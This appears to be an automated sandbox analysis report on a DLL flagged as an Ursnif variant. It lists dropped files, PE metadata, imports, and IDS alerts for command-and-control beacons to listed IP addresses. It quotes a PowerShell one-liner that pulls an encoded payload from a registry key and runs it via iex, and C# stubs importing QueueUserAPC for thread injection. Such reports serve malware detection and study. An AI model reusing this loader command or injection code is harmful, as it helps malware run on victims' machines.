              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........

              C:\Users\user\AppData\Local\Temp\sjfy431f.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.3386347893313015
              Encrypted:false
              SSDEEP:24:AId3ka6KHf1E8cKaM5DqBVKVrdFAMBJTH:Akka6Af1E8cKxDcVKdBJj
              MD5:67EB5E2F017A649CC23A1087ADE069B1
              SHA1:1DF9C625CB803F220A526CBA638E49333090188B
              SHA-256:BA084FDF251C7820AF14F6C4BA6327476CD3093FDA26E9A30936C96F228E8442
              SHA-512:518C660F89C42027E9A3E61F396A9FC74B11C77F653EC04054F7103C0EE9C9E00526F33D982080EA8D7B9FF6A39598DF47FAB2C49CD53A33E14CFA3FCF6A9CB3
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sjfy431f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.

              C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.20333273927167
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fYaUzxs7+AEszIWXp+N23fYY:p37Lvkmb6KHQ9WZE8QY
              MD5:18A8C0617983F7C6A255C16EBFBFA03F
              SHA1:BE39A447947DA0B70EF6179615B909FDA5531AB1
              SHA-256:9589F2B65F8A4B1EB5AB2118C8D597C1EFCFD7D46BBC0A4D71FB14568F4D9D1C
              SHA-512:202635C7B4FED6948B57E8FD5A1B6F4A1F344F41FC775122539BCC7426044203DDB95F78E43B85B8140E5D925C05CBA3BD12B8F3A443C450EBDB72B812D5CABB
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs"

              C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6122841762978606
              Encrypted:false
              SSDEEP:24:etGS98OmU0t3lm85nt4tdalqQg6A4S41lI+tkZfAjBq3VUWI+ycuZhNIakSEPNnq:6jXQ3r5eXa1kxJKsF31ulIa3Eq
              MD5:97286B2F7B63EF72C7A3499C675926A4
              SHA1:596B03B70A9D8D9836A9E9016C6FC29E400B9C2C
              SHA-256:2689C35999A287EC6A79C036E9BC3E4BCCB301177439A0E28EE1CD3A992A64F6
              SHA-512:4B0EB62F4F727662A1A7B4DEE3D76D898D8E578D6876E4B45BA2F16F1504DFEC1956E971E5A6FAFB421FE130E5FBFD3C498B6C39458437C2BB368A352426697B
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........

              C:\Users\user\AppData\Local\Temp\tpt0a0ul.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.309161433570556
              Encrypted:false
              SSDEEP:24:AId3ka6KHQSE8QNKaM5DqBVKVrdFAMBJTH:Akka6AQSE8QNKxDcVKdBJj
              MD5:3B7C745FCB06DAB92F185F316C4D4F8C
              SHA1:FB0758E988C94CBE2D44855EC6277C4D5BCBD93E
              SHA-256:73E945B24291C0F86223CF538E212D0B917925464239B852B5BD563FAA346300
              SHA-512:2361DC1DBDCBF46D4212666D6529B69BB372B9C36951664D959B568F51A0E73A821D366DCAA7174BE13E7399DCCBD43A8865FD45B00B04BD61F6287FB47A13F5
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.

              C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.24953594154855
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fzX0zxs7+AEszIWXp+N23fzXxn:p37Lvkmb6KHz0WZE89
              MD5:921DA3E9E391C4E51D9B00C93242E112
              SHA1:0492BE02AA73C3074F7D992586E58A4C42A4A7F7
              SHA-256:C57416A1C2DA2D8A34B3471166EE2D9AEFF6A15A1C597A3948F49E07AED199E4
              SHA-512:1DAD5FC0E74B448404EF0F5E84D5A442F7E93839035D99708084354A3EC7D6A0F178A3873431CF50964FDA7FF4FCA448E5048E33FB63F3F434E49D069954D8FC
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs"

              C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6227088507264447
              Encrypted:false
              SSDEEP:24:etGS98OmU0t3lm85nt4tdalqQg6AxIS41lI+tkZfgBYDVUWI+ycuZhNPsakSuhPE:6jXQ3r5eXa1mxJgCR31ul0a3oq
              MD5:5A0894EE2C43BC7C6D64BD8F2C1D338E
              SHA1:2488A63B7FB8C0A75F679D1460AAF47BD70696BE
              SHA-256:2F9C20B59F57CE66825E6993FE7FBD62B0B7FF9476F30233035F3A7A63F772DF
              SHA-512:9B8A49AE43ECF45643C49A2362D8B029FA387494B59541CA637DD86886A8019B79C88A04AFB9FE30313E6C7880A7A83A408080F454EC667C2A945653553B2003
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........

              C:\Users\user\AppData\Local\Temp\ugg3o5nf.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.318973223926223
              Encrypted:false
              SSDEEP:24:AId3ka6KHzVE84KaM5DqBVKVrdFAMBJTH:Akka6ABE84KxDcVKdBJj
              MD5:5A18C993C7FF50AA27F10C8B0ADE5D05
              SHA1:B5B05B6405F4A87A87DA79956725DF8EACDFC1B4
              SHA-256:0BF337B488EAFDDAE024DB4ABFAEED1D133411463FA5367EDE729B65E69215AC
              SHA-512:033A6D45D8EAFE4F7C0DE1A5BB0107C839A7CF81BE00D4A27714AE1D53146686A61DE2C79D911E2695A4BA46BEEDF24FCBABA459B48B83A511AA10A1362707BF
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\Documents\20220126\PowerShell_transcript.124406.aljG3MvD.20220126102824.txt

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):5.529378781796543
              Encrypted:false
              SSDEEP:24:BxSAC1xvBnFx2DOXUWvNtLCHY4XW5HjeTKKjX4CIym1ZJXaHNtLCHY4v:BZCHvhFoOFeY4G5qDYB1ZgteY4v
              MD5:0880C2B69E83763B63FAC27CD40DE7B4
              SHA1:5DB053C3F830A58AEE807E20D631D4B33004D879
              SHA-256:AFC6DC0233C2F1B344CF9EBA1DB4717EA073C8ADE024BB6F126DD04EC63D5142
              SHA-512:8B0D83575AD7FAD2AC12E611BFD11413211BDBE4D5A23B4181D1C963684B2ABD30BBAAC1D80AEF06BC8F243C69D47C91117604F4C2B36AEB93BC5A92F0AADE78
              Malicious:false
              Reputation:unknown
              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126102826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 2924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220126102826..**********************..PS>new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymu

              C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):5.5297740287848836
              Encrypted:false
              SSDEEP:24:BxSAC1xvBnFx2DOXUWvNtLCHY4XW+HjeTKKjX4CIym1ZJXaHNtLCHY4v:BZCHvhFoOFeY4G+qDYB1ZgteY4v
              MD5:C0AA34F71A7B9399B941D17203D4104F
              SHA1:C20FF7A8FE481FDF01BD50D47B99CFC884F568B6
              SHA-256:2B54331C3F4EF85922D9E264DC1B959576441774C61ED5FA768703CB781AF43B
              SHA-512:86B234D4EE43EAA98147A256E2CB3F23E6BF42EDEAEA10C436D5B1AE198CDEE12FCCD1CA0AB4C11738A1C5FCA4506F9A6003573CB2F6CABE2A499DCF35D4A63B
              Malicious:false
              Reputation:unknown
              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126102826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5940..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220126102826..**********************..PS>new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymu

              Static File Info

              General

              File type:MS-DOS executable, MZ for MS-DOS
              Entropy (8bit):4.5782669711427175
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • VXD Driver (31/22) 0.00%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:61f113091fd0c.dll
              File size:1062256
              MD5:687f33ac9cb2e8b3c1e7659422caf253
              SHA1:472513fe01ecbc2f51d70d762c1992a4a24c6c15
              SHA256:d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
              SHA512:62a3b416d304dd7ab4a128440b493734215ba8acaf3112d5f08054406e1679f1f2b75286a789e471cf67faa19ada593d18f143b2b8e5233283cb7ce76e93198f
              SSDEEP:12288:JZbmvejxoFNjrmkkHZkkkkkEkk2bkkkmkMcpmmkkkknkkkkk0TKxvsXkCk1jX3k+:JZaGeF7
              File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....8...................................................0......................................,7..O..

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x10002ed0
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x10000000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:2aebc4455d4d4828b36e9df040988a2b

              Authenticode Signature

              Signature Valid:false
              Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
              Signature Validation Error:The digital signature of the object did not verify
              Error Number:-2146869232
              Not Before, Not After
              • 10/30/2007 5:00:00 PM 11/24/2010 3:59:59 PM
              Subject Chain
              • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
              Version:3
              Thumbprint MD5:773A103A1953B292916AAA8D3382140B
              Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
              Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
              Serial:758F5EE8263B6694719D8434EB998608

              Entrypoint Preview

              Instruction
              mov ecx, eax
              push 10012E9Dh
              mov ecx, eax
              mov edx, eax
              mov ecx, eax
              mov ebx, eax
              call dword ptr [1000509Ch]
              mov ecx, eax
              call dword ptr [100050F0h]
              mov ecx, eax
              mov ebx, eax
              push 10001083h
              ret
              push esi
              fld qword ptr [eax]
              push eax
              call 00007F71549CB436h
              jc 00007F71549C5876h
              call 00007F71549CB1F6h
              and esi, 0Fh
              push ebp
              pop ebp
              mov edi, dword ptr [ebp+08h]
              mov dword ptr [ebp+7Ch], ebx
              shr ecx, 02h
              jmp 00007F71549C5875h
              add esp, 14h
              or ecx, FFFFFFFFh
              push 00000000h
              pop ecx
              pop ebx
              push 00000000h
              lea ebp, dword ptr [esp-000002A8h]
              pop edi
              mov ebp, esp
              mov eax, ecx
              mov dword ptr [ebp-80h], C000000Dh
              jmp 00007F71549CC9E8h
              mov dword ptr [ebp-80h], C000000Dh
              call 00007F71549CBD6Ah
              push edi
              jne 00007F71549C5876h
              mov dword ptr [ebp+74h], edi
              mov dword ptr [ebp-74h], esi
              mov eax, dword ptr [esp+0Ch]
              fadd qword ptr [eax]
              adc byte ptr [eax], dl
              jmp dword ptr [1000DD64h+ecx*4]
              pop esi
              mov esi, dword ptr [ebp+08h]
              mov dword ptr [10028B28h], 10014229h
              cmp ecx, 00000100h
              jmp 00007F71549C4D96h
              shl ebx, 10h
              jc 00007F71549C5876h
              shl ebx, 08h
              jmp 00007F71549C4D96h
              push ebp
              mov ebp, esp

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x372c0x4f.text
              IMAGE_DIRECTORY_ENTRY_IMPORT0x60000x3c.data
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x1020000x1570.rsrc
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1120000x4f0.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x50000x124.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x36580x3800False0.586356026786data6.75923318812IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x50000x1240x200False0.322265625data2.25596773491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x60000x1b8680xd800False0.810528790509data6.21770504074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x220000xef7040xef800False0.0616274138831data4.07049476262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x1120000x4f00x600False0.720052083333data5.80292166531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Imports

              DLLImport
              advapi32.dllMakeSelfRelativeSD, GetSecurityDescriptorSacl, GetSecurityDescriptorOwner, ReportEventA, DeregisterEventSource, GetAclInformation, RegisterEventSourceA, GetSidSubAuthority, GetSidLengthRequired, IsValidSid, SetSecurityDescriptorDacl, GetSecurityDescriptorLength, ImpersonateNamedPipeClient, GetLengthSid, CopySid, GetSecurityDescriptorControl, InitializeSecurityDescriptor, RevertToSelf, AddAce, InitializeSid, GetSecurityDescriptorGroup, MakeAbsoluteSD, GetSecurityDescriptorDacl, InitializeAcl
              kernel32.dllResumeThread, GetModuleFileNameA, GetProcAddress, ExitProcess, ConnectNamedPipe, lstrcmpiA, HeapReAlloc, VirtualProtectEx, GetVersionExA, FindAtomA, WriteFile, FreeLibrary, CreateNamedPipeA, ResetEvent, GetModuleHandleA, TlsAlloc, CreateEventA, HeapAlloc, TlsGetValue, QueryPerformanceCounter, InterlockedDecrement, WaitNamedPipeA, InitializeCriticalSection, GetFullPathNameA, TlsSetValue, GetLastError, lstrlenA, DeleteCriticalSection, GetTickCount, LeaveCriticalSection, HeapSize, GetCurrentThreadId, CloseHandle, OpenEventA, LoadLibraryExA, GetCurrentProcessId, SetEvent, HeapFree, HeapDestroy, GetProcessHeap, SetNamedPipeHandleState, TlsFree, ReadFile, EnterCriticalSection, WaitForSingleObject, CreateFileA, InterlockedIncrement

              Exports

              NameOrdinalAddress
              DllRegisterServer10x10001e0c

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              01/26/22-10:27:49.438083TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974680192.168.2.313.107.42.16
              01/26/22-10:27:53.249243TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974980192.168.2.313.107.42.16
              01/26/22-10:27:53.249243TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974980192.168.2.313.107.42.16
              01/26/22-10:28:10.396904TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.3194.76.226.200
              01/26/22-10:28:10.396904TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.3194.76.226.200
              01/26/22-10:28:10.427335TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:10.427335TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:10.463294TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.3194.76.226.200
              01/26/22-10:28:10.883430TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:10.883430TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:11.085647TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.3194.76.226.200
              01/26/22-10:28:11.085647TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.3194.76.226.200
              01/26/22-10:28:11.148815TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.3194.76.226.200
              01/26/22-10:28:11.148815TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.3194.76.226.200
              01/26/22-10:28:11.422935TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:11.422935TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975380192.168.2.3194.76.226.200
              01/26/22-10:28:11.783045TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.3194.76.226.200
              01/26/22-10:28:11.894969TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.3194.76.226.200
              01/26/22-10:28:11.894969TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.3194.76.226.200
              01/26/22-10:28:13.619188TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975580192.168.2.3194.76.226.200
              01/26/22-10:28:14.677802TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975580192.168.2.3194.76.226.200
              01/26/22-10:28:14.677802TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975580192.168.2.3194.76.226.200
              01/26/22-10:28:16.546866TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975580192.168.2.3194.76.226.200
              01/26/22-10:28:16.546866TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975580192.168.2.3194.76.226.200

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 26, 2022 10:28:10.375735044 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.396404982 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.396543026 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.396903992 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.405402899 CET4975380192.168.2.3194.76.226.200
